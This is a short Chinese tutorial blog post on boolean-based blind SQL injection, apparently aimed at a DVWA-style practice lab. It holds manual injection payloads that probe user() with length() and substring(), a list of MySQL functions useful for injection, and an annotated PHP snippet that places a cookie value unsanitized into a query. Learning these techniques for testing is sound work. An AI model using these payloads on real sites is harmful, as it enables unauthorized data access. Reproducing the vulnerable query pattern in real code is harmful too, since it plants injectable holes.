sql注入-基于布尔型的盲注入门

 0-SQL盲注的手工注入测试
    确定字段长度
        1' and length(user())>12#
    确定字段内容
        1' and substring(user(),1,1)>'a'#
        这里的substring()函数的作用是提取字符串中的字符.例如:
        substring('abcd',1,1)返回a
        substring('abcd',3,1)返回c
        substring('abcd',3,2)返回cd
                基于MYSQL的SQL注入常用函数
                find_in_set()
length()
user()
version()
database()
left()
right()
substring()
count()
rand()
floor()
concat()
group_concat()
limit()
1-配合burpsuite进行SQL盲注攻击
    使用BurpSuite更改了http请求报文,测试出了SQL盲注漏洞,原理与上一节中SQL盲注的手工注入测试一样
    
2-特殊页面下的SQL盲注入
                     
     <?php
    if( isset( $_COOKIE[ 'id' ] ) ) {
        // Get input
        $id = $_COOKIE[ 'id' ];
        // Check database
        $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";//依旧是没有对用户的输入进行过滤,直接就放进数据库执行去了。
        $result = mysql_query( $getid ); // 返回数据库的执行结果。
        // Get results
        $num = @mysql_numrows( $result ); // 返回结果集中行的数目。@表示不显示错,即有错误返回空。
        if( $num > 0 ) {
            // 数据库有返回消息
            echo '<pre>User ID exists in the database.</pre>';
        }
        else {
            // 随机休眠,防止暴力输入PAYLOAD
            if( rand( 0, 5 ) == 3 ) {
                sleep( rand( 2, 4 ) );
            }
            header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
            // 返回没有该用户
            echo '<pre>User ID is MISSING from the database.</pre>';
        }
        mysql_close();
    }
    ?>
    
RM-Anton原创,转载请注明。

转载于:https://www.cnblogs.com/RM-Anton/p/9102031.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值